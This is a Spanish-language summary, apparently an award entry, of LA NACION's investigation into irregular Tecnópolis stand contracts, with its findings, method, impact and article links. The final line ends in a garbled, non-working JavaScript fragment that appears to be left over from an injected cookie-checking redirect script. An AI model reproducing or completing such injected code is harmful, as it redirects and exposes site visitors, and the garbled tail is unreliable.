Contratos en Tecnópolis – LA NACION (Argentina)

 

Maia Jastreblansky y Romina Colman del equipo de LNdata.

Maia Jastreblansky es periodista de Política del diario LA NACION. Colaboradora de LN Data. Lic. en Ciencias de la Comunicación (UBA). Data Journalism Awards 2013. Premio Adepa al Periodismo de Investigación 2013.

 

*   Revelaciones de la investigación, numeradas.

1)    En Tecnópolis, la feria de ciencia y tecnología creada el gobierno nacional, se hicieron contratos directos por montos que, de acuerdo a la ley, deberían haber pasado por un proceso de licitación pública.

2)    Una de las empresas beneficiadas pertenecía al empresario proveedor de pasajes aéreos a la Presidencia. 

3)    Un matrimonio de funcionarios contrató a su propia empresa de eventos para uno de los stands de la muestra.

4)    Una joven indigente de 22 años figuró como adjudicataria de un contrato millonario, sin consentimiento.

 

*   Descripción metodológica de la investigación: explicando sus orígenes, hipótesis iniciales y desarrollo, tipos de búsqueda y de fuentes, los recursos materiales y humanos empleados y el tiempo que tomó el trabajo.

La investigación tuvo su origen en la observación sistemática del Boletín Oficial por parte del equipo de LA NACION Data, que detectó precios elevados en las contrataciones directas para los stands de Tecnópolis. A partir de la publicación de las irregularidades, fuentes en off denunciaron que una pareja de funcionarios del ministerio de Planificación había contratado a su propia empresa de eventos para uno de los stands de la muestra.

La hipótesis derivó en búsquedas en páginas web, en múltiples pedidos de información pública y en la revisión de declaraciones juradas, convenios y contrataciones públicas.

El trabajo, realizado en equipo, demoró alrededor de dos meses para demostrar que el matrimonio de funcionario estuvo de los dos lados del mostrador: desde la esfera pública, adjudicaron presupuestos superiores a los $27 millones de pesos, desde la esfera privada, recibieron esos mismos fondos para realizar un pabellón Tecnópolis.

 

*   Problemática de la investigación. ¿Por qué se requería una investigación periodística para obtener la información? Una explicación de los retos planteados y cómo se revolvieron.

La investigación sobre los contratos de Tecnópolis involucró múltiples pasos: contactos con informantes anónimos, pedidos de información pública, rastreo de documentación. Los documentos revelaron los datos que los organismos y las personas involucradas se negaban a informar.

 

*   Impacto social que tuvo el trabajo tras ser publicado.

El trabajo periodístico derivó en dos investigaciones judiciales. Además, el ministro de Planificación despidió al matrimonio de funcionarios implicado. La investigación fue premiada por la Asociación de Entidades Periodísticas Argentinas.

 

 

LINKS:

 

Contratos por $21 millones para stands de Tecnópolis, con urgencia y sin licitación

http://www.lanacion.com.ar/1501919-contratos-por-21-millones-para-stands-de-tecnopolis-con-urgencia-y-sin-licitacion

 

Avanza la investigación por presuntos desvíos de fondos en Tecnópolis

http://www.lanacion.com.ar/1560251-avanza-la-investigacion-por-presuntos-desvios-de-fondos-en-tecnopolis

 

Funcionarios K y empresarios exitosos: la pareja que ganó contratos en Tecnópolis

http://www.lanacion.com.ar/1588640-tecnopolis-planificacion-stand-santamaria-de-vido

Tecnópolis: la “gerenta” que vive en una villa

http://www.lanacion.com.ar/1590720-tecnopolis-la-gerenta-que-vive-en-una-villa

 

 

Tecnópolis: el dinero de los stands fue a manos de funcionarios y, además, a empresas “fantasma”

http://www.lanacion.com.ar/1588977-julio-de-vido-tecnopolis-el-dinero-de-los-stands-fue-a-manos-de-funcionarios-a-empresas-fant

 

Stands en Tecnópolis: la Justicia investiga a los funcionarios de Planificación involucrados en la contratación

http://www.lanacion.com.ar/1593598-stands-en-tecnopolis-la-justicia-investiga-a-los-funcionarios-de-planificacion-involucrados-

Tecnópolis: Julio De Vido echó al funcionario sospechado por las contrataciones irregulares

http://www.lanacion.com.ar/1596082-tecnopolis-julio-de-vido-echo-al-funcionario-sospechado-por-contrataciones-irregulares “; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}